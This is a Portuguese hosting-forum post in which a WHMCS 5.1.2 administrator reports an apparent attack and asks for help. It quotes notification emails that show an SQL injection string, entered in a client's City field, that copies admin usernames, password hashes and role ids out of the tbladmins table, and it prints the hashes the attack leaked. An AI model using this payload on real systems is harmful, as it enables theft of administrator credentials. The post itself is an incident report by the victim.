Clicky

Ir para conteúdo

Entre para seguir isso  
Robert Birschener

Tentativa De Invasão Whmcs

Posts Recomendados

Olá pessoa, boa tarde.

Hoje recebi um cadastro um tanto estranho no WHMCS, cadastro com letras repetidas (nome: fdgdfgd), email inválido, etc. Depois de cadastrar a pessoa alterou alguns campos, abaixou segue o primeiro e segundo email respectivamente do whmcs notificando a mudança:

Client ID: 1422 - aaadsfsdfsdf fgfdg has requested to change his/her details as indicated below:

City: 'fghfgh' to 'AES_ENCRYPT(1,1), address2=(SELECT * FROM (SELECT group_concat(username,0x3a,password,0x3a,roleid) FROM tbladmins) as x)'

If you are unhappy with any of the changes, you need to login and revert them - this is the only record of the old details.

####################################################

Client ID: 1422 - aaadsfsdfsdf fgfdg has requested to change his/her details as indicated below:

Address 2: 'NOME_DE_USUARIO:321bbdfaf845a62a42ec2dea17214bca:1,NOME_DE_USUARIO:1d5d56f61db6e03b6fc42bc3a168ac36:1,NOME_DE_USUARIO:23c084ac7681a1eeea72093d8a844806:3' to 'aaa'
City: 'OµÜÿ(%ϱT*Cé9' to 'aaa'

If you are unhappy with any of the changes, you need to login and revert them - this is the only record of the old details.

Sendo que no segundo email onde eu coloquei escrito NOME_DE_USUARIO são os usuários do meu WHMCS, fiquei bastante preocupado com isso. Já alterei todas as senhas por precaução, mas gostaria de saber se já aconteceu com alguém e se tem alguma solução, a minha versão do WHMCS é a 5.1.2.

Compartilhar este post

Link para o post
Compartilhar em outros sites
Visitante
Este tópico está impedido de receber novos posts.
Entre para seguir isso  

• Quem Está Navegando   0 membros estão online

Nenhum usuário registrado visualizando esta página.

O Portal do Host

Dicas para sua empresa de hospedagem. Artigos, notícias, tutoriais e os aspectos da indústria de hospedagem.

Limestone Networks

A LSN tem sido parceira e patrocinadora do PDH, fornecendo uma plataforma segura e confiável.

Cloud - Servidores decicados - Co-location